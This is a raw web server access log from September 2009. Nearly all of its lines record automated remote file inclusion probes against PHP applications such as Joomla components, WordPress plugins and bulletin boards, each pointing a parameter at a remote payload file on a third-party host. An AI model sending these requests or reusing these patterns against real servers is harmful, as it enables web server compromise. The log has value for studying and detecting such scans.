79.174.78.83 - - [07/Sep/2009:10:49:10 -0500] "GET /logs/access_log.1241913600//s_loadenv.inc.php?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:49:18 -0500] "GET /logs/access_log.1247097600//s_loadenv.inc.php?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.228 - - [07/Sep/2009:10:51:04 -0500] "GET /logs/access_log.1217894400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.188 - - [07/Sep/2009:10:55:30 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:55:30 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:55:30 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
199.96.29.70 - - [07/Sep/2009:10:56:01 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://indo.home.ro/idbit??? HTTP/1.1" 404 331 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
199.96.29.70 - - [07/Sep/2009:10:56:01 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://indo.home.ro/idbit??? HTTP/1.1" 404 326 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
222.236.47.188 - - [07/Sep/2009:10:56:13 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:56:13 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:56:13 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:56:19 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:56:26 -0500] "GET /logs/access_log.1236038400//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.22 - - [07/Sep/2009:10:56:32 -0500] "GET /logs/access_log.1208217600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.188 - - [07/Sep/2009:10:56:47 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:10:56:54 -0500] "GET /logs/access_log.1236038400//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:10:58:55 -0500] "GET /logs/access_log.1247616000///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:10:58:55 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:10:58:57 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:00:54 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:01:04 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:11:01:18 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204076 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:11:01:19 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.805"
199.96.29.70 - - [07/Sep/2009:11:04:16 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
199.96.29.70 - - [07/Sep/2009:11:04:16 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 329 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
59.150.247.202 - - [07/Sep/2009:11:05:07 -0500] "GET /logs/access_log.1248134400//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:05:07 -0500] "GET /logs//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:05:10 -0500] "GET //myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
65.18.168.84 - - [07/Sep/2009:11:05:29 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.18.168.84 - - [07/Sep/2009:11:05:29 -0500] "GET //include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
66.244.236.249 - - [07/Sep/2009:11:05:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:29 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:37 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:37 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:37 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.18.168.84 - - [07/Sep/2009:11:05:42 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.18.168.84 - - [07/Sep/2009:11:05:42 -0500] "GET //include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
66.244.236.249 - - [07/Sep/2009:11:05:53 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:05:55 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:05 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:05 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:05 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:07 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:07 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:23 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.244.236.249 - - [07/Sep/2009:11:06:37 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:06:37 -0500] "GET /logs/access_log.1237075200//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:06:37 -0500] "GET /logs/access_log.1236211200//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:06:37 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:06:37 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:07:56 -0500] "GET /logs//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:07:58 -0500] "GET //myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
65.55.106.209 - - [07/Sep/2009:11:08:03 -0500] "GET /logs/access_log.1158192000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.209 - - [07/Sep/2009:11:08:10 -0500] "GET /logs/access_log.1215907200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.150.247.202 - - [07/Sep/2009:11:08:29 -0500] "GET /logs/access_log.1248134400//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:09:18 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:09:18 -0500] "GET /logs/access_log.1248134400//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:09:18 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.83.139 - - [07/Sep/2009:11:09:23 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
212.227.83.139 - - [07/Sep/2009:11:09:23 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
212.227.83.139 - - [07/Sep/2009:11:09:23 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
117.110.59.2 - - [07/Sep/2009:11:09:34 -0500] "GET /logs/access_log.1240012800///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.47.7.71 - - [07/Sep/2009:11:09:53 -0500] "GET //s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.47.7.71 - - [07/Sep/2009:11:09:53 -0500] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
78.111.80.234 - - [07/Sep/2009:11:15:21 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:15:21 -0500] "GET /logs/access_log.1237075200//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:15:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:11:15:24 -0500] "GET /logs/access_log.1236038400//skin/zero_vote/ask_password.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:11:20:29 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204076 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:11:20:29 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.805"
213.189.2.39 - - [07/Sep/2009:11:20:34 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.2.39 - - [07/Sep/2009:11:20:34 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.189.2.39 - - [07/Sep/2009:11:20:34 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.212.198.167 - - [07/Sep/2009:11:20:37 -0500] "GET /logs/index.php HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
213.189.2.39 - - [07/Sep/2009:11:21:21 -0500] "GET /logs/access_log.1247875200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:11:23:13 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:11:23:13 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:11:23:13 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:23:49 -0500] "GET /logs//ea-gBook/index_inc.php?=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:23:49 -0500] "GET //ea-gBook/index_inc.php?=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:23:49 -0500] "GET /logs/access_log.1247270400//ea-gBook/index_inc.php?=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.40.25.236 - - [07/Sep/2009:11:24:05 -0500] "GET /logs/access_log.1247875200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:25:29 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:25:29 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:25:29 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:11:25:42 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:11:25:42 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:11:25:42 -0500] "GET /logs/access_log.1242086400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:11:25:44 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:11:26:30 -0500] "GET /logs/access_log.1247875200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:26:45 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:26:46 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:26:53 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:26:53 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
65.55.207.29 - - [07/Sep/2009:11:30:02 -0500] "GET /logs/access_log.1194566400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.189.18.73 - - [07/Sep/2009:11:31:19 -0500] "GET /logs//phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:31:19 -0500] "GET //phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:31:19 -0500] "GET /logs/access_log.1245196800//phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:31:20 -0500] "GET /logs/access_log.1247011200//phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:24 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:24 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.150.109.161 - - [07/Sep/2009:11:31:39 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.150.109.161 - - [07/Sep/2009:11:31:39 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
58.150.109.161 - - [07/Sep/2009:11:31:39 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:52 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:58 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:58 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:31:58 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:32:04 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:32:04 -0500] "GET /?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:32:04 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:32:06 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
58.150.109.161 - - [07/Sep/2009:11:32:46 -0500] "GET /logs/access_log.1247875200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:33:16 -0500] "GET /logs/access_log.1246492800//init.php?API_HOME_DIR=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:33:16 -0500] "GET /logs//init.php?API_HOME_DIR=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:33:16 -0500] "GET //init.php?API_HOME_DIR=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:11:33:16 -0500] "GET /logs/access_log.1240444800//init.php?API_HOME_DIR=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.109 - - [07/Sep/2009:11:33:32 -0500] "GET /logs/access_log.1217548800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.40.68.132 - - [07/Sep/2009:11:33:32 -0500] "GET /logs/access_log.1232755200//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:11:33:33 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
211.40.68.132 - - [07/Sep/2009:11:33:33 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
92.50.143.90 - - [07/Sep/2009:11:33:35 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
